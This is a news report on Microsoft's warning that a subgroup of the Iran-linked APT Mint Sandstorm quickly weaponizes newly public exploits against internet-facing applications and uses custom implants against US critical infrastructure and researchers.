Microsoft has issued a warning about a subgroup of Iran-linked advanced persistent threat (APT) actor Mint Sandstorm, which has started to quickly adopt proof-of-concept (PoC) exploit code targeting vulnerabilities in internet-facing applications. The nation-state group is also known as TA453, Ajax Security Team, Charming Kitten, APT35, Magic Hound, NewsBeef, Newscaster, and Phosphorus. According to Microsoft, the group has been active since at least 2011 and has targeted activists, government entities, journalists, critical infrastructure, and other entities. The overall activity of Mint Sandstorm can be associated with the Islamic Revolutionary Guard Corps (IRGC), Iran’s military intelligence arm.
One of the subgroups under Mint Sandstorm has specialized in compromising high-value targets for information theft and was recently observed quickly adopting PoC code for known vulnerabilities. Initially, the subgroup focused on performing reconnaissance, but in 2022, it transitioned to directly targeting critical infrastructure organizations in the United States, including energy companies, seaports, transit systems, and a major utility and gas company. Microsoft noted that these attacks were “potentially in support of retaliatory destructive cyberattacks.”
The Mint Sandstorm subgroup was seen adopting PoC exploitation code for N-day vulnerabilities quickly after they were publicly disclosed. Previously, the threat actor took weeks to weaponize exploits for vulnerabilities such as ProxyShell and Log4Shell. Microsoft reports that “Mint Sandstorm began exploiting CVE-2022-47966 in Zoho ManageEngine on January 19, 2023, the same day the POC became public. They later exploited CVE-2022-47986 in Aspera Faspex within five days of the POC being made public on February 2, 2023.”
Microsoft warns that Mint Sandstorm continues to exploit older vulnerabilities for initial compromise, mostly as part of ‘opportunistic and indiscriminate’ activity, which underlines the need to apply patches for known vulnerabilities in a timely manner. Following initial compromise, the Mint Sandstorm subgroup deploys a custom PowerShell script for discovery, followed by lateral movement using Impacket, and the deployment of additional tools. In some attacks, the subgroup uses PowerShell scripts for account enumeration and RDP connections and an SSH tunnel for command-and-control (C&C), to steal the victim’s Active Directory database, compromise user credentials, and access user accounts. In other attacks, the subgroup created scheduled tasks for persistence, used webhook.site for C&C, and deployed custom malware.
Since 2022, the threat actor has been observed using two custom implants, namely Drokbk (written in .NET, consists of an installer and a backdoor) and Soldier (a multistage .NET backdoor that can fetch additional payloads and uninstall itself). In some instances, the subgroup was observed relying on low-volume phishing campaigns to target “individuals affiliated with high-profile think tanks or universities in Israel, North America, or Europe with ties to the security and policy communities” with malicious documents leading to the CharmPower modular backdoor. Microsoft concludes that “capabilities observed in intrusions attributed to this Mint Sandstorm subgroup are concerning as they allow operators to conceal C&C communication, persist in a compromised system, and deploy a range of post-compromise tools.”